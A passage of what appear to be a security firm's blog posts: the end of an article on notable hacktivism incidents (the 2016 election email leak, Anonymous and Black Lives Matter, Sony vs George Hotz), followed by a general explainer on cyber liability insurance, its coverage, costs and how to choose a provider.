This attack, a joint venture between WikiLeaks and Russia’s foreign military intelligence directorate Glavnoye Razvedyvatel’noye Upravleniye (GRU), focused on emails between then-presidential candidate Hillary Clinton and her campaign manager. The emails were illegally obtained by the GRU and released by WikiLeaks, with the goal of discrediting Ms. Clinton in order to further the campaign of her opponent, Donald Trump.

Hackers used spear-phishing emails to steal credentials from DNC members and gain unauthorized access to the emails. The campaign significantly impacted the Clinton campaign and may have contributed to her loss. Following the leak, the US Department of Justice indicted 12 Russian hackers for the incident.

Black Lives Matter Movement (2020)

While the BLM (Black Lives Matter) movement reaches beyond the realm of hacktivism, the group Anonymous did throw their weight behind this movement protesting police corruption following the death of George Floyd. The group had also voiced similar condemnations in the past following the murders of Michael Brown and 12-year-old Tamir Rice.

In support of the social-justice-focused BLM movement, Anonymous released a video on Twitter that specifically criticized the Minneapolis police department in the wake of the shooting. As a result of the video, Anonymous’ Twitter account gained 3.5 million new followers in the following days, and the campaign has been linked to a series of DDoS attacks that briefly shut down the Minneapolis police department website, its parent website, and the Buffalo, New York government website over the course of a single weekend.

How Hacktivism Harms Businesses

While some hacktivist activities, such as creating open-source software that allows people in China to circumvent government censorship, are arguably good, we have seen that hacktivism also has a dark side. 

Hackers of all stripes, including some hacktivists, often use open-source hacking tools to penetrate networks with the goal of paralyzing or destroying legitimate businesses. This can be done for a variety of reasons, including retaliatory action in the case of George Hotz.

Sony vs Hotz

In 2010, then-teenage researcher George Hotz (now President at comma.ai) reverse-engineered the Sony private key and published it online. This allowed almost anyone with an internet connection to rewrite Sony’s firmware and classify themselves as a developer on the Sony network, gaining free access to all of Sony’s online games. This action adheres to a philosophy shared by many hacktivists and other hackers: that all information, even proprietary information, should be free. 

In response to his actions, Sony sued Hotz, which attracted the attention of hacktivists. The company was targeted by several DDoS attacks and a data breach that exposed the credit card numbers of 12 million innocent customers, as well as 75,000 “music codes” and 3.5 million “music coupons”, resulting in massive financial losses for the company. All in all, Sony estimates it lost about $173 million, including the cost of increased customer support, incentives to woo customers back, legal costs, lost sales, and the cost of improving its cybersecurity systems. 

Ultimately, regardless of the goal of the hacktivist organization, gaining unauthorized access to a company’s network or other digital assets is wrong, and companies need to take steps to ensure their cybersecurity posture is robust enough to thwart attacks and avoid or at least minimize damage. 

Is your organization prepared? For more information, or to start crafting your incident response plan, please contact our team today.

What is Cybersecurity Insurance (& Does Your Business Need It?)

An unfortunate reality of the modern, connected business world is that it is no longer a question of if your organization will experience a cybersecurity incident, but when. In 2020, there was one new ransomware victim every ten seconds, while the average cost of a data breach the same year was $3.86 million.

Those eye-watering numbers have many organizations, of all sizes and in all verticals, justifiably concerned. Improving your cybersecurity posture and ensuring you have an effective incident response plan in place can significantly reduce the downtime your organization experiences should an incident occur, as well as minimize or even eliminate damages. However, to help offset the costs associated with cybersecurity incident recovery, more organizations than ever before are turning to cybersecurity insurance.

What is Cybersecurity Insurance?

Cybersecurity insurance (also called cyber liability insurance) is designed to cover the costs associated with cybercrime should your technological systems or customer data be targeted as part of a cybersecurity incident. While your exact coverage will vary depending on your insurance provider and other factors, cyber liability insurance typically covers legal costs and damages such as:

Cyber Liability Insurance vs Cybercrime Insurance: What is the Difference?

Some insurance providers also offer cybercrime insurance in addition to cyber liability insurance. This additional insurance is designed to help compensate your organization for funds lost during a cybersecurity incident such as a hack or social engineering attack, including notification costs, data restoration costs, and associated legal expenses.

What Typically Isn’t Covered

As with all forms of insurance, there are a few things cyber liability insurance typically doesn’t cover. While what is and is not covered will vary depending on your insurance provider and policy, typical exclusions include:

  • Potential future lost profits
  • Loss of value due to intellectual property theft
  • Betterment, which is the cost to improve your internal technology systems, including software or security upgrades, after an attack has occurred

Common Types of Cyber Liability Claims

When it comes to insurance claims, most cyberattacks fall into one of three categories: hacking, social engineering, and malware (including ransomware).

Hacking

Hacking (gaining unauthorized access to a computer system, usually by exploiting existing security vulnerabilities) is the most common type of attack that leads to an insurance claim. This is because if an attacker compromises your system or network, your company could be liable for a wide variety of costs related to the attack, including:

  • Third-party lawsuits
  • The costs associated with notifying affected parties and other stakeholders
  • Public relations and reputation management costs
  • Regulatory fines

Social Engineering

Social engineering attacks (including phishing scams) depend on an attacker tricking someone inside your company into helping them. Attackers trick unknowing individuals with access to your system into essentially opening the door for them, usually by impersonating a trusted individual (such as their boss or another superior, someone from accounting, or someone from the bank) and asking them to click a link, hand over their login credentials, or grant access to restricted areas of the network. The employee then unwittingly either lets the attacker into the network or downloads malware, which grants access or otherwise allows the attacker to wreak havoc.

Malware

Malware, short for malicious software, comes in a variety of forms and is an incredibly common type of cyberattack. Malware can be difficult to defend against because every program is different and uses different strategies to infiltrate your network. Ransomware is a very common form of malware designed to hijack your system and lock you and your employees out of the network. The attacker then demands a ransom in exchange for releasing or unlocking the system. However, not all attackers follow through on their end and may simply take the ransom money and leave the network locked.

First-Party vs Third-Party Insurance

What type of cyber liability insurance your organization decides to purchase should be based on a variety of factors, including your needs as an organization and what entities you need to protect. Unfortunately, when it comes to cyberattacks, the business originally targeted is not the only party that may be impacted. As such, there are two different types of cyber liability insurance: first-party and third-party.

First-party insurance protects your company or organization and will cover the costs outlined in your policy associated with an attack. Any organization that handles electronic data should purchase a first-party policy to cover the various expenses that organizations face in the wake of a cybersecurity incident.

Third-party insurance is designed to protect organizations that offer professional services to other businesses that could be impacted in the event of an attack. This type of coverage is often compared to professional liability insurance in the sense that the third-party insurance can help safeguard your business in the event you are sued by another organization for errors you may have made that resulted in damages or losses to the company suing you.

For example, let’s say your organization is a law firm. Your law firm’s data security is compromised, and as a result, several of your clients accuse you of failing to prevent the data breach. In this instance, third-party cyber liability insurance would cover your legal fees, government penalties and fines, and any settlements or judgments related to these claims.

What is the Average Cost of Cybersecurity Insurance?

How much your cyber liability insurance plan costs will depend on a variety of factors, including the type of business you run and the level of cyber risk you are exposed to. However, a recent study by AdvisorSmith Solutions Inc. found that the average cost of a cyber liability policy in 2019 was $1,500 per year for $1 million in coverage with a $10,000 deductible.

How much your policy costs will also depend on:

  1. Your size and industry: The more employees you have, the greater your chances of falling for a successful phishing or other social engineering attack, which will drive up your insurance premiums. However, a larger factor is your industry. Different industries are classified as low, medium, or high risk, depending on the type and amount of data your organization stores.
  2. How much data you store, and how sensitive it is: Low-risk organizations, such as small local businesses with limited customer bases, will pay less for their coverage than higher-risk organizations such as retail stores that collect and store customer credit card numbers both in-store and online through their website or eCommerce store. Organizations that store large amounts of highly sensitive personal data (such as social security numbers or dates of birth), such as hospitals or other healthcare facilities, will pay higher premiums.
  3. Your annual revenue: In the eyes of most insurance companies, the more money your business makes, the more likely a cybercriminal is to target your organization. As such, organizations with higher revenue streams are more likely to pay higher premiums for cyber liability insurance.
  4. How robust your cybersecurity posture is: Most insurance companies reward organizations that take cybersecurity seriously and dedicate significant resources and person-hours to safeguarding their digital assets. To help keep your insurance costs low, all organizations (particularly high-risk ones) should invest in robust cybersecurity measures, have sufficient security controls in place, and ensure their employees receive appropriate cybersecurity training.
  5. The terms of your policy: Your coverage limits and deductible also play a significant role in determining your insurance premiums. The more coverage you want, the higher your monthly insurance premiums will be. Your deductible is the amount of loss your business is responsible for in the event of an incident that is covered by your policy. Organizations that opt for a higher deductible (absorbing more of the initial costs themselves) typically pay lower premiums but are on the hook for more of the damages in the event of an incident. On the other hand, organizations that opt for a lower deductible will pay higher monthly premiums but will have more of their losses covered in the event of an incident. Organizations with robust security measures in place may opt for lower premiums and a higher deductible, while high-risk organizations that store lots of sensitive data may opt for higher premiums in exchange for a lower deductible.

Does My Business Need Cybersecurity Insurance?

If your organization handles electronic data, you should have at least a basic cyber liability insurance plan in place. Like all forms of insurance, cyber liability insurance is there to cover worst-case, what-if scenarios.

Handing over funds for cyber liability insurance every month may seem like an unnecessary expense, but a large-scale cybersecurity incident can be enough to bankrupt a small or even medium-sized organization and destroy your reputation. Having access to emergency funds to defray costs such as hiring an expert team to help you fend off an attack in progress and limit damages, replacing damaged equipment, paying fines, covering your legal costs, and managing your reputation after an incident could be the difference between your organization weathering the storm relatively unscathed or folding under the pressure.

Take a Proactive Approach

Investing in a robust yet flexible cybersecurity posture will do more than just help keep your premiums low; it can also help your organization fend off attacks in real time and limit or even eliminate permanent damage to your infrastructure.

Investments such as employee cybersecurity training (both as ongoing training and part of your employee onboarding process) can also help safeguard your organization by giving your team the tools they need to spot suspicious activities (such as phishing scams) and sound the alarm before any damage can be done.

Selecting the Best Insurance Provider for Your Organization

With cybercrime on the rise, more insurance companies than ever are offering cyber liability insurance. As with any insurance policy, it often pays to shop around. Start by finding out if your existing insurance provider offers cyber liability insurance. If they do, you might be able to negotiate a break on your premiums or a better deductible in light of your existing relationship.

However, it also helps to shop around and see what other providers and policies are available. Since the cost of your insurance plan is typically determined in part by your industry or vertical, it can help to reach out to other organizations like yours for recommendations and advice. You may also want to consider consulting with your MSSP (Managed Security Services Provider) to see if they have any recommendations. MSSPs have extensive cybersecurity experience and work with a variety of organizations, so they may be able to help you determine what sort of policy is best for your organization’s unique needs.

For more information about the importance of cyber liability insurance, and cybersecurity in general, please contact our team today.